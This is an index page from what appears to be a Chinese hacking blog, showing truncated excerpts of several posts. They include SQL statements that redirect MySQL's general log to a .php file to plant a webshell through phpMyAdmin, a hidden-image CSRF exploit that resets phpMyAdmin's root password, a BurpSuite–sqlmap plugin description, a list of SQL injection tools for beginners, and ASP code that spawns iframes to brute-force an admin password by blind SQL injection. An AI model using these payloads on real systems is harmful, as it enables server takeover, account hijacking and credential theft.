三个sql语句拿下phpmyadmin的shell

分类:安全 | 2018-06-17 | 撸过 1,792 次
0人扯谈

三个sql语句拿下phpmyadmin的shell

首先要知道路径

一句一句的执行

---------------------------------------------------------
set global general_log='on';
---------------------------------------------------------
SET global general_log_file='D:/webshell/www/cmd.php';
---------------------------------------------[......]

继续阅读

phpMyAdmin 4.7.x CSRF 漏洞利用

分类:安全 | 2018-06-15 | 撸过 852 次
0人扯谈

修改root密码:

保存为:webshell.html

<p>Hello World</p>
<img src="https://webshell.cc/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.webshell.cc%27)" style="display:none;" />

密码为:www.webshell.cc

写文件

首先你要知道路径

保存为:webshell.html
[......]

继续阅读

BurpSuite集成Sqlmap神器!

分类:工具 | 2016-06-30 | 撸过 2,053 次
0人扯谈

设置很简单,这个已经是编译好的,只要在:extender-->extentions-->add 添加jar就OK了!

不过需要BurpSuite需要放到sqlmap根目录下!

本插件实现原理:

将目标请求的数据存放到临时文件中,然后调用"sqlmap.py -r $file"来启动对请求的sql注入检测 在Sqlmap tab中,你可以配置sqlmap除 -r外的其他参数,比如:
加入配置中写:"--level 3",真实执行时是:sqlmap.py -r $file --level 3
回到burpsuite主页面,在任何请求连接上右键,会看到新增"send to Sqlmap",点击后会开启cmd窗口,针对此请求进行sql注入检测

设置sqlmap参数:
[......]

继续阅读

学会使用这些工具,你就是合格的新手!

分类:安全 | 2012-10-12 | 撸过 5,511 次
4人扯谈

SQL Injection:
啊D            算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手
明小子       比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的
NBSI        这个软件对于SQL server的注入有极高的准确率
Pangolin  俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多种数据库都能注入
Havij       国外的注入软件,比穿山甲好点,但是是英文的,也支持各种平台

Web Scanner[......]

继续阅读

字符型SQL注入猜解,利用iframe显示更方便

分类:安全 | 2012-02-19 | 撸过 679 次
0人扯谈

遇到一个注入点 是字符型的

测试了几个工具 貌似都不行

那就只有手工了

大家都知道 到猜解值的时候 一个一个asc大小的比较 还是比较麻烦的

所以想到这个

<%

for s=40 to 128
    response.write "<iframe src=""https://www.webshell.cc/default.asp?id=111111' and 1=(select top 1 count(*) from Admin where Asc(mid(password,3,1))="&s&")  and '1'='1""></iframe[......]

继续阅读